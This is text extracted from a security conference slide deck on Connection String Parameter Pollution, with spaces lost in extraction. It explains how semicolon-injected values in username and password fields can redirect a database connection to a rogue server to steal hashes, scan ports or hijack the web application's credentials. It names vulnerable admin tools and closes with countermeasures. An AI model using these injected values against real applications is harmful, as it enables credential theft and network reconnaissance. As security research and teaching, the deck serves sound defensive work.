Upload
others
View
16
Download
0
Embed Size (px)
Citation preview
Connec&onStrings
• Definethewayanapplica&onconnectstoadatarepository
• Thereareconnec&onstringsfor:– Rela&onalDatabases(MSSQL,Oracle,MySQL,…)– LDAPDirectories– Files(XML,plain,csv,xls,mdb,…)– Etc…
DatabasesConnec&onStrings
DataSource=myServerAddress;
Ini&alCatalog=myDataBase;UserId=myUsername;
Password=myPassword;
DBConnec&onbuildup
GoogleHacking
GoogleHacking
UDL(UniversalDataLinks)Files
HowWebappconnectstoDB
Opera&ngSystemAccounts
DataSource=myServerAddress;
Ini&alCatalog=myDataBase;UserId=;
Password=;IntegratedSecurity=SSPI/
True/Yes;
DatabaseCreden&als
DataSource=myServerAddress;
Ini&alCatalog=myDataBase;UserId=myUsername;
Password=myPassword;IntegratedSecurity=No;
Syslogins
Customuserstable
Connec&onstring
1.‐Webapplicatonconnectsusingitscreden&alstothedatabase.
2.‐Asksuserlogininforma&on.
3.‐Checkslogininforma&onaboutinfostoredincustomuserstable.
Selectidfromusers
Webapplica&onmanagestheloginprocess
Usersauthen&catedbyWebApp
DatabaseEngine ApprunningonWebServer
Syslogins Connec&onstring
1.‐Webapplica&onasksforcreden&als.
2.‐Aconnec&onstringiscomposedwiththecreden&alstoconnecttothedatabase.
3.‐Rolesandpermitsarelimitedbytheuserusedintheconnec&onstring
Databaseenginemanagestheloginprocess
Usersauthe&catedbyDatabase
DatabaseEngine ApprunningonWebServer
Connec&onStringA^acks
• It´spossibletoinjectparametersintoconnec&onstringsusingsemicolonsasaseparator
DataSource=myServerAddress;
Ini&alCatalog=myDataBase;
IntegratedSecurity=NO;
UserId=myUsername;
Password=myPassword;Encryp2on=Off;
Connec&onStringBuilder
• Availablein.NETFramework2.0
• Buildsecureconnec&onstringsusingparameters• It´snotpossibletoinjectintotheconnec&onstring
Arepeopleawareofthis?
Connec&onStringParameterPollu&on
• Thegoalistoinjectparametersintheconnec&onstring,whethertheyexistornot
• Hadduplicatedaparameter,thelastvaluewins
• Thisbehaviorallowsa^ackerstooverwritecompletelytheconnec&onstring,thereforetomanipulatethewaytheapplica&onwillworkandhowshouldbetheitauthen&cated
DBConnec&onObject
Pollu&onableBehavior
Param1
Param2
Param1=ValueA Param2=ValueB Param1=ValueC Param2=ValueD
WhatcanbedonewithCSPP?Overwriteaparameter
DBConnec&onObjectDataSource
UID
DataSource=DB1 UID=sa DataSource=DB2
password
password=Pwnd!
ScanningtheDMZ
DevelopmentDatabase1
FinnacialDatabase
TestDatabase
ForgoGenDatabase
FW
WebappvulnerabletoCSPP
Internet Produc&onDatabase
DataSource
PortScanningaServer
FW
WebappvulnerabletoCSPP
Internet Produc&onDatabaseServer
DB1,80DB1,21DB1,25
DB1,1445
DataSource
WhatcanbedonewithCSPP?Addaparameter
DBConnec&onObjectDataSource
UID
DataSource=DB1 UID=sa IntegratedSecurity=True
password
password=Pwnd!
CSPPA^ack1:Hashstealing
1.‐RunaRogueServeronanaccessibleIPaddress:
Rogue_Server
2.‐Ac&vateasniffertocatchtheloginprocess
Cain/Wireshark
3.‐OverwriteDataSourceparameter
Data_Source=Rogue_Server
4.‐ForceWindowsIntegratedAuthen&ca&on
IntegratedSecurity=true
CSPPA^ack1:Hashstealing
Datasource=SQL2005;ini5alcatalog=db1;IntegratedSecurity=no;userid=+’User_Value’+;Password=+’Password_Value’+;
Datasource=SQL2005;ini5alcatalog=db1;IntegratedSecurity=no;userid=;DataSource=Rogue_Server;
Password=;IntegratedSecurity=True;
CSSP1:ASP.NETEnterpriseManager
CSPPA^ack2:PortScanning
1.‐DuplicatetheDataSourceparametersehngtheTargetserverandtargetporttobescanned. Data_Source=Target_Server,target_Port
2.‐Checktheerrormessages:
‐NoTCPConnec&on‐>Portisclosed
‐NoSQLServer‐>Portisopen
‐InvalidPassword‐>SQLServerthere!
CSPPA^ack2:PortScanning
Datasource=SQL2005;ini5alcatalog=db1;IntegratedSecurity=no;userid=+’User_Value’+;Password=+’Password_Value’+;
Datasource=SQL2005;ini5alcatalog=db1;IntegratedSecurity=no;userid=;DataSource=Target_Server,Target_Port;
Password=;IntegratedSecurity=True;
CSPP2:myLi^leAdmin
PortisOpen
CSPP2:myLi^leAdmin
PortisClosed
CSPPA^ack3:HijackingWebCreden&als
1.‐DuplicateDataSourceparametertothetargetSQLServer
Data_Source=Target_Server
2.‐ForceWindowsAuthen&ca&on
IntegratedSecurity=true
3.‐Applica&onpoolinwhichthewebappisrunningonwillsenditscreden&alsinordertologintothedatabaseengine.
CSPPA^ack3:HijackingWebCreden&als
Datasource=SQL2005;ini5alcatalog=db1;IntegratedSecurity=no;userid=+’User_Value’+;Password=+’Password_Value’+;
Datasource=SQL2005;ini5alcatalog=db1;IntegratedSecurity=no;userid=;DataSource=Target_Server;
Password=;IntegratedSecurity=true;
CSPPA^ack3:WebDataAdministrator
CSPPA^ack3:myLi^leAdmin/myLi^leBackup
CSPPA^ack3:ASP.NETEnterpriseManager
OtherDatabases
• MySQL– DoesnotsupportIntegratedsecurity– It´spossibletomanipulatethebehaviorofthewebapplica&on,
although• PortScanning• Connecttointernal/tes&ng/fordevelopingDatabases• Stealcreden&als
• OraclesupportsintegratedauthorityrunningonWindowsandUNIX/Linuxservers– It´spossibletoperformalldescribeda^acks
• Hashstealing• PortScanning• HijackingWebcreden&als
– Alsoit´spossibletoelevateaconnec&ontosysdbainordertoshutdown/startupaninstance
DemoDemo
Scanner
• Proofofconcepttotestyournetwork• Tryahijackingwebcreden&alsa^ack• Wri^eninASP.NETC#
• Freedownload(codeincludeofcourse)h^p://www.informa&ca64.com/csppScanner.aspx
CSPPScanner
ScannerCSPP:A^acks
DemoDemo
myLi^leAdmin/myLi^leBackup
myLi^leToolsreleasedasecuryadvisoryandapatchaboutthis
ASP.NETEnterpriseManager
• ASP.NETEnterpriseManageris“abandoned”,butit´ss&llbeenusedinalotofwebControlPanels.
• Fixthecodeyourself
ASP.NETEnterpriseManager• ASP.NETEnterpriseManageris“abandoned”,butit´ss&llbeenusedinalotofwebControlPanels.
• Fixthecodeyourself
ASP.NETWebDataAdmistrator
ASPWebDataAdministratorissecureinCodePlexwebsite,butnotinMicrosoowebsitewhereanunsecureoldversioniswaspublished
Countermeasures
• Hardenyourfirewall– Outboundconnec&ons
• Reviewyourinternalaccountspolicy– Webapplica&on– Webserver– DatabaseEngine
• UseConnec5onStringBuilder
• Filterthe;)
Ques&ons?
ContactoChemaAlonsochema@informa&ca64.comh^p://www.informa&ca64.comh^p://elladodelmal.blogspot.comh^p://twi^er.com/chemaalonso
AuthorsChemaAlonsoManuelFernández“TheSur”AlejandroMarsnBailónAntonioGuzmán